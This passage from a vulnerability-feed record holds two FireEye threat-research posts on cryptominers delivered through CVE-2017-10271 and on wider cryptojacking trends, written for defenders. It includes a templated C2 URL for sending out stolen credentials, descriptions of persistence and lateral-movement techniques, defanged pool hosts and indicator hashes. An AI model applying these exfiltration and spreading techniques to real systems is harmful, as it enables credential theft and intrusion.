The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. 
\n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\nFigure 6: Terminating processes directly\n\nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled task deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether it\u2019s running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. 
This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware on remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.\n\nIf the lateral movement with credentials fails, then the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if it\u2019s vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. 
We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so that cyber criminals maximize their reach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n| Detection Name |\n| --- |\n| POWERSHELL DOWNLOADER (METHODOLOGY) |\n| MONERO MINER (METHODOLOGY) |\n| MIMIKATZ (CREDENTIAL STEALER) |\n\n#### Indicators of Compromise\n\n| MD5 | Name |\n| --- | --- |\n| 3421A769308D39D4E9C7E8CAECAF7FC4 | cranberry.exe/logic.exe |\n| B3A831BFA590274902C77B6C7D4C31AE | xmrig.exe/yam.exe |\n| 26404FEDE71F3F713175A3A3CEBC619B | 1.ps1 |\n| D3D10FAA69A10AC754E3B7DDE9178C22 | 2.ps1 |\n| 9C91B5CF6ECED54ABB82D1050C5893F2 | info3.ps1 |\n| 3AAD3FABF29F9DF65DCBD0F308FF0FA8 | info6.ps1 |\n| 933633F2ACFC5909C83F5C73B6FC97CC | lower.css |\n| B47DAF937897043745DF81F32B9D7565 | lib.css |\n| 3542AC729035C0F3DB186DDF2178B6A0 | bootstrap.css |\n\nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T16:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T16:30:00", "id": "FIREEYE:57B0F10A16E18DC672833B1812005B76", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T00:24:38", "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. 
These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, they must be validated and propagated across the network. Nodes (the computers connected to the blockchain network) validate and relay transactions, and miners collect them into \"blocks\" that can be appended to the chain. Each block is cryptographically hashed and must include the hash of the previous block, which forms the \"chain\" in blockchain. Producing a valid block requires finding a value (a nonce) that makes the block hash satisfy the network's current difficulty target, which can only be done by repeated hashing and therefore consumes a machine's computational resources. The difficulty is adjusted periodically so that, as more hashing power joins the network, each block requires more work to find. To smooth out their rewards, many miners join collections of machines called \"pools\" that divide the search among their members. The more computational resources a pool harnesses, the greater its chance of mining the next block, and when it does, the reward is shared among participants in proportion to the work each contributed. Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. 
Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol and forked from Bytecoin. Unlike most cryptocurrencies, Monero uses ring signatures: the spender's key is mixed with a set of decoy keys drawn from the blockchain, so a verifier can confirm that one member of the ring authorized the transaction without being able to tell which one, making the sender untraceable. Monero also uses stealth addresses, one-time destination addresses derived for each payment that only the recipient can link to their wallet and that are infeasible to resolve through blockchain analysis, so individual Monero transactions cannot be linked to each other or to a public address while remaining cryptographically secure.\n\nThe Monero blockchain also uses a \"memory-hard\" hashing algorithm called CryptoNight which, unlike Bitcoin's SHA-256, deters mining on application-specific integrated circuit (ASIC) chips. This is a deliberate design goal of the Monero developers and keeps CPU mining feasible and profitable. Because of these inherent privacy features and the profitability of CPU mining, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-sourced tools, many criminals rely on crypters. 
Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n**XMR Mining Utilities** \n--- \nXMR-STACK \nMINERGATE \nXMRMINER \nCCMINER \nXMRIG \nCLAYMORE \nSGMINER \nCAST XMR \nLUKMINER \nCPUMINER-MULTI \n \nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. 
According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. 
According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. 
According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n * Monero\n * Bytecoin\n * Electroneum\n * DigitalNote\n * Karbowanec\n * Sumokoin\n * Fantomcoin\n * Dinastycoin\n * Dashcoin\n * LeviarCoin\n * BipCoin\n * QuazarCoin\n * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. 
Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64-bit and 32-bit (x86) Windows OS\n * Hides from the following popular task managers:\n   * Windows Task Manager\n   * Process Killer\n   * KillProcess\n   * System Explorer\n   * Process Explorer\n   * AnVir\n   * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU load or network traffic could leave industrial infrastructure unresponsive, impeding operators from interacting with the controlled process in real time.\n\nThe electricity cost, measured in kilowatt-hours (kWh), depends on several factors: how often the malicious miner software is configured to run, how many threads it is configured to use while running, and the number of machines mining on the victim's network. 
The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212 kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also expose often-overlooked security holes in a company's network. An organization infected with cryptomining malware was reachable by a route that could just as well have delivered more severe payloads, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. 
Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle WebLogic servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes deployments, the container runtime and orchestration platform commonly used to deploy and scale a company's cloud workloads. In most cases, successful attacks occur because management interfaces are exposed and misconfigured and/or protected by weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web Services (AWS) S3 cloud environment. 
Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. A publicly writable S3 bucket lets anyone on the internet read and replace its hosted content, including injecting mining scripts or other malicious code into the pages it serves.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. 
The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. 
Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. 
However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. 
This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. 
Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. 
It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. 
The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n**ZIP Filenames** \n--- \ncalifornia_540_tax_form_2013_instructions.exe \nstate_bank_of_india_money_transfer_agency.exe \nformat_transfer_sms_banking_bni_ke_bca.exe \nconfirmation_receipt_letter_sample.exe \nsbi_online_apply_2015_po.exe \nestimated_tax_payment_coupon_irs.exe \nhow_to_add_a_non_us_bank_account_to_paypal.exe \nwestern_union_money_transfer_from_uk_to_bangladesh.exe \ncan_i_transfer_money_from_bank_of_ireland_to_aib_online.exe \nhow_to_open_a_business_bank_account_with_bad_credit_history.exe \napply_for_sbi_credit_card_online.exe \nlist_of_lucky_winners_in_dda_housing_scheme_2014.exe \n \nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). 
